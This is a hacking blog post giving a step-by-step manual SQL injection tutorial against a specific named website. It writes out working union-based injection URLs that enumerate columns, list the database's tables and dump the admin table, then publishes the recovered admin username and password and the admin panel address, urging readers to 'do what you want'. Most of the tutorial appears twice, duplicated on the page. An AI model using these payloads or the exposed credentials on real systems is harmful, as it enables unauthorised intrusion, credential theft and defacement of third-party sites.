Manual SQL Injection ~ HacKing TriCKs & TiPS

Lone on 12:45

How To Manual Sql Injection-Step By Step

First we need to find a website which is vulnerable to

Sql inejection attacks ..

Use google dorks for finding a web :)

ok so lets start .. :)

I found a Vulnerable site :) here it is ,

txi.co.in/article.php?id=2

By adding ' in the end we check if the site is vulnerable or not like this

txi.co.in/article.php?id=2' you can see Error in the middle ..

ok so , lets found its columns.. :)

for finding columns we use .. order by "num"--+ LIKE THIS :

order by 1--+ (increase the number until we get an error )

http://txi.co.in/article.php?id=2' order by 1--+ (NO ERROR)

http://txi.co.in/article.php?id=2' order by 2--+ (NO ERROR)

http://txi.co.in/article.php?id=2' order by 3--+ (NO ERROR)

http://txi.co.in/article.php?id=2' order by 4--+ (NO ERROR)

http://txi.co.in/article.php?id=2' order by 5--+ (ERROR)

We are getting An error on order by 5--+

that means the site has only 4 columns ,,

Now ,

lets find Valid String ...

for finding valid string we use

http://txi.co.in/article.php?id=2' and 0 union select 1,2,3,4--+

(we select 4 columns because the website has 4 columns) and we use ""and 0 "" for falsing the query

After that a num will show on the screen ... Like here 2 and 3 showing ..

means 2 and 3 are the vulnerable columns ..

now replace 2 with "" group_concat(table_name) ""

And in the end .. write "" from information_Schema.tables where table_schema=database() ""

Like this ..

http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(table_name),3,4 from information_Schema.tables where table_schema=database()--+

here ,we got all tables in the current database :) :)

we need admin username and password for login .. it should be in admin table..

Note :: admin tables are named differently sometimes ... like (users , adminlogin , user_login , etc etc )

here we have the admin table named "" admin ""

Now For Getting Columns Of Tables We use ...

group_concat(column_name) Replace with (table_name)

and in the end write..

" from information_schema.columns where table_name=(HEX VALUE OF TABLE)--+ "

Like This ..

http://txi.co.in/article.php?id=2%27%20and%200%20union%20select%201,group_concat%28column_name%29,3,4%20from%20information_Schema.columns%20where%20table_name=0x61646d696e--+

Hex Of Admin Is .. 0x61646d696e (you will learn that) :)

now we got the username and password column..

To Dump the Data From columns We Use :

group_concat(login,0x3a,password) Replace with (column_name)

and in the end write

from admin--+

Like This :

http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(login,0x3a,password),3,4%20from admin--+

Sunday, 4 May 2014

Manual SQL Injection

How To Manual Sql Injection-Step By Step

First we need to find a website which is vulnerable to

Sql inejection attacks ..

Use google dorks for finding a web :)

ok so lets start .. :)

I found a Vulnerable site :) here it is ,

txi.co.in/article.php?id=2

By adding ' in the end we check if the site is vulnerable or not like this

txi.co.in/article.php?id=2' you can see Error in the middle ..

ok so , lets found its columns.. :)

for finding columns we use .. order by "num"--+ LIKE THIS :

order by 1--+ (increase the number until we get an error )

http://txi.co.in/article.php?id=2' order by 1--+ (NO ERROR)

http://txi.co.in/article.php?id=2' order by 2--+ (NO ERROR)

http://txi.co.in/article.php?id=2' order by 3--+ (NO ERROR)

http://txi.co.in/article.php?id=2' order by 4--+ (NO ERROR)

http://txi.co.in/article.php?id=2' order by 5--+ (ERROR)

We are getting An error on order by 5--+

that means the site has only 4 columns ,,

Now ,

lets find Valid String ...

for finding valid string we use

http://txi.co.in/article.php?id=2' and 0 union select 1,2,3,4--+

(we select 4 columns because the website has 4 columns) and we use ""and 0 "" for falsing the query

After that a num will show on the screen ... Like here 2 and 3 showing ..

means 2 and 3 are the vulnerable columns ..

now replace 2 with "" group_concat(table_name) ""

And in the end .. write "" from information_Schema.tables where table_schema=database() ""

Like this ..

http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(table_name),3,4 from information_Schema.tables where table_schema=database()--+

here ,we got all tables in the current database :) :)

we need admin username and password for login .. it should be in admin table..

Note :: admin tables are named differently sometimes ... like (users , adminlogin , user_login , etc etc )

here we have the admin table named "" admin ""

Now For Getting Columns Of Tables We use ...

group_concat(column_name) Replace with (table_name)

and in the end write..

" from information_schema.columns where table_name=(HEX VALUE OF TABLE)--+ "

Like This ..

http://txi.co.in/article.php?id=2%27%20and%200%20union%20select%201,group_concat%28column_name%29,3,4%20from%20information_Schema.columns%20where%20table_name=0x61646d696e--+

Hex Of Admin Is .. 0x61646d696e (you will learn that) :)

now we got the username and password column..

To Dump the Data From columns We Use :

group_concat(login,0x3a,password) Replace with (column_name)

and in the end write

from admin--+

Like This :

http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(login,0x3a,password),3,4%20from admin--+

Here We Got The Username And Password ;) ;)

Username : admin

Password : hitesh123

Now Login Into Admin Panel :D :D

And Do What You Want :P :P

Admin Panel : http://www.txi.co.in/admin/login.php

Filled Under:

0 comments:

Post a Comment

About Me

Type Of Program

Blog Archive

Followers

Contact Form

Total Pageviews

About

Link list 3

Popular Posts

Categories

Link list 1

Featured Posts